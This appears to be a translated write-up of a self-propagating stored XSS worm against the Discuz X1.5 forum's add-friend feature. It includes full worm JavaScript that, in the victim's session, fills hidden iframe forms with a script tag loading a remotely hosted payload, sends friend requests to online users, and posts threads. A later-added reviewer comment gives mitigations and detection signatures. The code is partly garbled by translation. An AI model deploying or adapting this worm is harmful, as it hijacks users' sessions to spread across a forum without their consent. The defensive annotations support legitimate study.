Discuz X1.5: stored XSS in the add-friend feature used for worm spread
Discuz X1.5 has a stored XSS in the add-friend feature; when users interact with it, the XSS fires and spreads the worm.
Location: Add a friend
Effect after x
Triggered after clicking
With the help of this stored XSS we carry out worm propagation. The Discuz session cookies are set HttpOnly; however, the effect of the XSS is that the script runs with the user's session privileges in the current domain, so this does not interfere with the worm's operation.
Step 1: the attacker sends the XSS worm payload to a user.
Step 2: after the victim clicks, the script, acting as the victim, adds other users as friends and attaches the payload.
Step 3: infected users infect one another, so the infection grows exponentially. To verify this, all infected users are driven by the JS to post.
Without further ado, the worm code is as follows:
You need to modify:
1. urlBase: the base address of the Discuz X1.5 forum
2. The address where the XSS payload is hosted
/*
 * Review note (defender's reading of the listing below; the original line is kept verbatim).
 * As pasted, the whole listing sits on one line that begins with `//`, so the interpreter
 * treats all of it as a comment and nothing executes.
 *
 * The two weaknesses the page describes this payload relying on:
 *  - Stored XSS sink: the friend-request "note" field is submitted with HTML/script markup,
 *    and the page states it is rendered to the recipient in a way that executes it, i.e.
 *    without contextual output encoding (hedged: the rendering code is not on this page).
 *  - Same-origin form driving: the add-friend and new-thread forms are loaded in hidden
 *    iframes inside the victim's authenticated session and their submit buttons are clicked
 *    from script. HttpOnly on the session cookie does not help here - no cookie is stolen,
 *    the victim's own session performs the actions. Anti-CSRF tokens alone do not stop it
 *    either, since same-origin script can read them from the loaded document.
 *
 * Mitigation: HTML-encode the note (and every other user-supplied field) at output in the
 * rendering context it lands in; add a Content-Security-Policy that disallows inline and
 * off-site script so a stored payload cannot load a remote script; consider disabling
 * script-driven submission paths (e.g. require re-authentication or a CAPTCHA for bulk
 * friend requests).
 * Detection: bursts of friend requests from one account carrying identical notes that
 * contain `<script`, and identical thread bodies posted from many accounts within a short
 * window (the payload posts a fixed subject and body), are the observable signatures.
 */
// Code for xss test // The base address of the Forum var urlBase =" http://forum.xxx.com "; Var add = function (uid) {var ifBox = window ['ifbox'] | (window ['ifbox'] = {}); var uyk = (new Date ()). getTime (); var ifFame = ifBox [uyk] = document. createElement ("iframe"); ifFame. src = urlBase + "/home. php? Mod = spacecp & ac = friend & op = add & uid = "+ uid; ifFame. width = 0; ifFame. height = 0; ifFame. onload = function () {try {// address for storing xss payload ifFame. contentDocument. getElementsByName ("note") [0]. value = 'Hello <script src =" http://xxx.xxx.xxx/js/dz.js "> </Script> '; ifFame. contentDocument. getElementById ("addsubmit_btn "). click (); ifFame = null;} catch (err) {}} document. body. appendChild (ifFame);} var newThread = function () {var if1 = document. createElement ("iframe"); if1.src = urlBase + "/forum. php? Mod = post & action = newthread & fid = 21 "; if1.width = 0; if1.height = 0; if1.onload = function () {var doc = if1.contentDocument; doc. getElementById ("subject "). value = "kakaka ~~~ "; If1.contentDocument. getElementById ("e_iframe "). contentDocument. body. innerHTML = "_______________ </br> <XSS Worm Test> </br> ------------- </br> \^__^ </br> \ (oo) \ _______ </br> (_) \/\ </br> | ---- w | </br> |||</br> "; doc. getElementById ("postsubmit "). click (); if1.onload = function () {return false ;}} document. body. appendChild (if1);} var if0 = document. createElement ("iframe"); if0.src = urlBase + "/Forum. php? Showoldetails = yes # online "; if0.width = 0; if0.height = 0; if0.onload = function () {var uli = if0.contentDocument. getElementsByTagName ("li"); for (var I = 0; I <uli. length; I ++) {if (uli [I]. title. length> 5) {var uid = uli [I]. childNodes [3]. href. substring (uli [I]. childNodes [3]. href. indexOf ("uid =") + 4); var r = Math. round (Math. random () * 10); // if (I % 10 = r) {// click newThread (); add (uid); // }}} document. body. appendChild (if0 );
There are many pitfalls, including asynchronous JS loading and cross-iframe element access. I hope this helps others.